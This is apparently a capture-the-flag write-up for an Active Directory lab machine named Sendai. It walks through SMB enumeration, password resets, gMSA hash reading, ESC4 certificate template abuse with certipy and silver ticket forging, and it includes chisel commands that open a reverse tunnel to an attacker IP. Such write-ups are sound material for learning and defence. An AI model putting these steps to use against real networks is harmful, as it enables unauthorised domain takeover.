Enumerating smb shares with anonymous login, we'll see `config`, `sendai` and `Users` share, where config was not accessible, Users didn't anything but sendai had some interesting files
<imgsrc="https://i.imgur.com/mQaCMNk.png"/>
<imgsrc="https://i.imgur.com/OjZZNAR.png"/>
<imgsrc="https://i.imgur.com/kSTgBfG.png"/>
The incident talked about users having weak passwords, all users will be prompted to change their password on logging in, the transfer directory had user's directories
<imgsrc="https://i.imgur.com/Ob5kSkE.png"/>
## Resetting domain user's password
These users can also be enumerated through `lookupsid` by brute forcing sids
<imgsrc="https://i.imgur.com/cNM7HDk.png"/>
On trying to login with null password, we'll get two users with password to be changed
Thomas.Powell is a member of `Support` group has `GenericAll` on `ADMSVC` group which has `ReadGMSAPassword` on `MGTSVC$` account. We'll need to add thomas in ADMSVC group, read the NThash of MGTSVC account
This lists down a template `SendaiComputer` which has EKU set to `Client Authentication` that can be used to authenticate on the system and ca-operators group has Full control over this template which means we can edit this template and impersonate as the domain admin, which is known as ESC4 (access control) abuse
<imgsrc="https://i.imgur.com/mQUF4HH.png"/>
<imgsrc="https://i.imgur.com/A10lXkN.png"/>
With certipy, we can change the configuration of this template to allow domain users to enroll for this template and impersonate any user
Another way of escalating privileges is through mssql, since mssql is running internally, having access on the machine we can port forward with`chisel`
```bash
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks
```
<imgsrc="https://i.imgur.com/hSVXA3l.png"/>
But we'll get login denied for sqlsvc account
<imgsrc="https://i.imgur.com/7dUxhoi.png"/>
With `ticketer,` forging a silver ticket for accessing MSSQL service as an administrator